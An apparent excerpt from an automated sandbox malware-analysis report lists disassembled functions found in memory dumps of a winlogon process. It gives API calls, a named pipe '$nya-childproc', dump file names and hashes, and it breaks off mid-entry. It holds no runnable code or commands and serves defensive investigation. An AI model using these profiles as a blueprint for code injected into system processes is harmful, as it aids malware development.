csm, xrefs: 000001E858959784
csm, xrefs: 000001E8589596A3

Memory Dump Source

Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: d0682c950318b24ca3d3fa786114ee4e70fcf2b4d2bcf4c9ff14f52512c3598d
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 98D15932624781CAFB609B65E4813EDB7A0FF55B99F100126EE8D57B9ADF38C591CB00

Function 000001E8589E6270 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E8589E62AB
GetThreadContext.KERNEL32 ref: 000001E8589E6415

Part of subcall function 000001E8589E60A0: GetCurrentThreadId.KERNEL32 ref: 000001E8589E60A4

Strings

!-M, xrefs: 000001E8589E627C

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID: !-M
API String ID: 1666949209-3625753649
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 47aa9fd017ce13dfdc8cce3b1fffb8f0b1d5320f829710c9dd302edf13d1fcb9
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 6CD16876215BC8C2DA719B1AE49439EBBA0F7C8B88F100526EE8D477A9DF3CC551CB01

Function 000001E8589B104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001E8589B10B1
RegEnumValueW.ADVAPI32 ref: 000001E8589B1117
GetProcessHeap.KERNEL32 ref: 000001E8589B115A
HeapAlloc.KERNEL32 ref: 000001E8589B1168
GetProcessHeap.KERNEL32 ref: 000001E8589B1185
HeapFree.KERNEL32 ref: 000001E8589B1193

Strings

d, xrefs: 000001E8589B10D6

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 38d4f9571245e440b7954d906e44009bf88ec267097f0bd0529f0bb9e571806e
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 7A415E32224BC4DAE760DF21E44839EB7A1F789B99F44812ADE8D47758DF39C485CB40

Function 000001E8589E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001E8589E10B1
RegEnumValueW.ADVAPI32 ref: 000001E8589E1117
GetProcessHeap.KERNEL32 ref: 000001E8589E115A
HeapAlloc.KERNEL32 ref: 000001E8589E1168
GetProcessHeap.KERNEL32 ref: 000001E8589E1185
HeapFree.KERNEL32 ref: 000001E8589E1193

Strings

d, xrefs: 000001E8589E10D6

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 87b19685d5550d53dfa281649fbafee5f2a6432d358866bd9b176f0872fd3111
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: B4417E72224BC0DAE760DF21E44479EBBA1F788B99F44812ADE8D0B758DF38C495CB40

Function 000001E85898104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001E8589810B1
RegEnumValueW.ADVAPI32 ref: 000001E858981117
GetProcessHeap.KERNEL32 ref: 000001E85898115A
HeapAlloc.KERNEL32 ref: 000001E858981168
GetProcessHeap.KERNEL32 ref: 000001E858981185
HeapFree.KERNEL32 ref: 000001E858981193

Strings

d, xrefs: 000001E8589810D6

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 29b9f728bab77240efbac586e63e46c34c41aa0db47c84664e4f4b0c4e543164
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 3D413D72224BC4DAE760DF21E44479EB7A1F788B98F44812ADE8A47B58DF38C585CB40

Function 000001E8589B2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001E8589B252D
GetCurrentProcessId.KERNEL32 ref: 000001E8589B2537
CreateFileW.KERNEL32 ref: 000001E8589B2568
WriteFile.KERNEL32 ref: 000001E8589B2590
ReadFile.KERNEL32 ref: 000001E8589B25AF
CloseHandle.KERNEL32 ref: 000001E8589B25B8

Strings

\\.\pipe\$nya-childproc, xrefs: 000001E8589B2549

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 53f6cef02f645eb2a2fe9a2c9db3bda22dae2a9c1ee46c936f8a3b94c1540e48
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: F311FC32624A80C2E710CB21F45839DBB60FB89B95F944226EE5E46AA8DF7DC145CB44

Function 000001E8589E2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001E8589E252D
GetCurrentProcessId.KERNEL32 ref: 000001E8589E2537
CreateFileW.KERNEL32 ref: 000001E8589E2568
WriteFile.KERNEL32 ref: 000001E8589E2590
ReadFile.KERNEL32 ref: 000001E8589E25AF
CloseHandle.KERNEL32 ref: 000001E8589E25B8

Strings

\\.\pipe\$nya-childproc, xrefs: 000001E8589E2549

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 846c3a5560e26103cabead096517360e1616f0bc0ff9605c36a1c1a426972b0f
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: B3114C32624B80C3E7148B21F45439EBB60FB89BD4F944326EE5E42AA8CF3CC154CB44

Function 000001E858982518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001E85898252D
GetCurrentProcessId.KERNEL32 ref: 000001E858982537
CreateFileW.KERNEL32 ref: 000001E858982568
WriteFile.KERNEL32 ref: 000001E858982590
ReadFile.KERNEL32 ref: 000001E8589825AF
CloseHandle.KERNEL32 ref: 000001E8589825B8

Strings

\\.\pipe\$nya-childproc, xrefs: 000001E858982549

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 890af977762eef70603ace4a83a4d3497f66bcba6cb61f9a36ffc4f47a52a63b
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 4D111C36624B80C2E7108B21F45839EB761FB89BD4F944326EE5E06AA8DF7CC155CB40

Function 000001E8589B7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001E8589B7C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001E8589B7CCA
_RTC_Initialize.LIBCMT ref: 000001E8589B7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001E8589B7D1E
__scrt_release_startup_lock.LIBCMT ref: 000001E8589B7D49

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 27e388ff75f9968c1a3076ffa7c8abd796299204315aad1e00faac73bc9cbdb0
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 97819B346386C4DEFB50AB66D8423EDF691AF89BC2F54423BAE4C57796DE38C8418700

Function 000001E8589E7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001E8589E7C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001E8589E7CCA
_RTC_Initialize.LIBCMT ref: 000001E8589E7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001E8589E7D1E
__scrt_release_startup_lock.LIBCMT ref: 000001E8589E7D49

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: e54040a27443ae2300c5be9bf8658d7072c2ffb2ec2708cb8b87e5662e836920
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 7E81E2346306C4E7FB55ABA5D8423EDFA90AF85784F444037AE4C57796EF38C8618702

Function 000001E858987C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001E858987C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001E858987CCA
_RTC_Initialize.LIBCMT ref: 000001E858987CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001E858987D1E
__scrt_release_startup_lock.LIBCMT ref: 000001E858987D49

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: aa7ed4abcabeb614043bce7b7e16046e57dd419dc341306133ec101a34ba4041
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: E581AD356306C6D6FB50AB66D8823EDF291AF85B84F444137AE4D67796DF38C8418F10

Function 000001E858957050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001E858957078
__scrt_acquire_startup_lock.LIBCMT ref: 000001E8589570CA
_RTC_Initialize.LIBCMT ref: 000001E8589570F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001E85895711E
__scrt_release_startup_lock.LIBCMT ref: 000001E858957149

Memory Dump Source

Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 121e28eb92a0111003718f76d7d7e0b3ae02a8899872275c93aa002c61d90da1
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 76819E796302C1EAFA549B66E8C13DDF2D1AF86782F448037AE0D47796DF38CA468700

Function 000001E8589EF870 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001E8589EF954

Strings

!-M, xrefs: 000001E8589EF9A5, 000001E8589EFA40
!-M, xrefs: 000001E8589EF97B
!-M, xrefs: 000001E8589EF984
!-M, xrefs: 000001E8589EF972
!-M, xrefs: 000001E8589EF969

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: !-M$ !-M$ !-M$ !-M$ !-M
API String ID: 3215553584-1373438697
Opcode ID: e24968551f1c80c218f728ec495c536f69034c28ce2eb30166b49967c8b6e302
Instruction ID: df305f1c95cecc459bc4b1112c6c6f1bf5fc172a448fd26f6a770b9b0e0d4e71
Opcode Fuzzy Hash: e24968551f1c80c218f728ec495c536f69034c28ce2eb30166b49967c8b6e302
Instruction Fuzzy Hash: 41619B326306C0D3FA799B29D5443EEFEA0AF85784F5544B7DE8E067A5EF38C9618201

Function 000001E8589B9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001E8589B9C6B,?,?,?,000001E8589B945C,?,?,?,?,000001E8589B8F65), ref: 000001E8589B9B31
GetLastError.KERNEL32(?,?,?,000001E8589B9C6B,?,?,?,000001E8589B945C,?,?,?,?,000001E8589B8F65), ref: 000001E8589B9B3F
LoadLibraryExW.KERNEL32(?,?,?,000001E8589B9C6B,?,?,?,000001E8589B945C,?,?,?,?,000001E8589B8F65), ref: 000001E8589B9B69
FreeLibrary.KERNEL32(?,?,?,000001E8589B9C6B,?,?,?,000001E8589B945C,?,?,?,?,000001E8589B8F65), ref: 000001E8589B9BD7
GetProcAddress.KERNEL32(?,?,?,000001E8589B9C6B,?,?,?,000001E8589B945C,?,?,?,?,000001E8589B8F65), ref: 000001E8589B9BE3

Strings

api-ms-, xrefs: 000001E8589B9B51

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 8343e08e4e288325730640f339af24e135ccc61e1639655fc0950d2a29a0937e
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 5F318B3123AA95D9EE129B06E8047EDB394FF89BA1F590636AD1E4A790EE38C444C310

Function 000001E8589E9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001E8589E9C6B,?,?,?,000001E8589E945C,?,?,?,?,000001E8589E8F65), ref: 000001E8589E9B31
GetLastError.KERNEL32(?,?,?,000001E8589E9C6B,?,?,?,000001E8589E945C,?,?,?,?,000001E8589E8F65), ref: 000001E8589E9B3F
LoadLibraryExW.KERNEL32(?,?,?,000001E8589E9C6B,?,?,?,000001E8589E945C,?,?,?,?,000001E8589E8F65), ref: 000001E8589E9B69
FreeLibrary.KERNEL32(?,?,?,000001E8589E9C6B,?,?,?,000001E8589E945C,?,?,?,?,000001E8589E8F65), ref: 000001E8589E9BD7
GetProcAddress.KERNEL32(?,?,?,000001E8589E9C6B,?,?,?,000001E8589E945C,?,?,?,?,000001E8589E8F65), ref: 000001E8589E9BE3

Strings

api-ms-, xrefs: 000001E8589E9B51

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: f8a3c0cb4d6d19ef5e9a90df121615d9a97d4b6a7d9f19caa0dcf2ecab134b8b
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 44315C31332781D6EE169B16E8407EDBB94BF84BA4F5D0636AD1E4A794EF38C464C350

Function 000001E858989AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001E858989C6B,?,?,?,000001E85898945C,?,?,?,?,000001E858988F65), ref: 000001E858989B31
GetLastError.KERNEL32(?,?,?,000001E858989C6B,?,?,?,000001E85898945C,?,?,?,?,000001E858988F65), ref: 000001E858989B3F
LoadLibraryExW.KERNEL32(?,?,?,000001E858989C6B,?,?,?,000001E85898945C,?,?,?,?,000001E858988F65), ref: 000001E858989B69
FreeLibrary.KERNEL32(?,?,?,000001E858989C6B,?,?,?,000001E85898945C,?,?,?,?,000001E858988F65), ref: 000001E858989BD7
GetProcAddress.KERNEL32(?,?,?,000001E858989C6B,?,?,?,000001E85898945C,?,?,?,?,000001E858988F65), ref: 000001E858989BE3

Strings

api-ms-, xrefs: 000001E858989B51

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 374182d59c510931cae3981e872b1b6b55f0781e7ed9810ecfe8984184a01ada
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: EE3180313226C2D9EE519B16E8007EDB394BF84BA0F590636ED1E47794EF38C454CB50

Function 000001E8589C3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001E8589C3431
GetLastError.KERNEL32 ref: 000001E8589C343D
CloseHandle.KERNEL32 ref: 000001E8589C3455
CreateFileW.KERNEL32 ref: 000001E8589C3480
WriteConsoleW.KERNEL32 ref: 000001E8589C349F

Strings

CONOUT$, xrefs: 000001E8589C3461

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

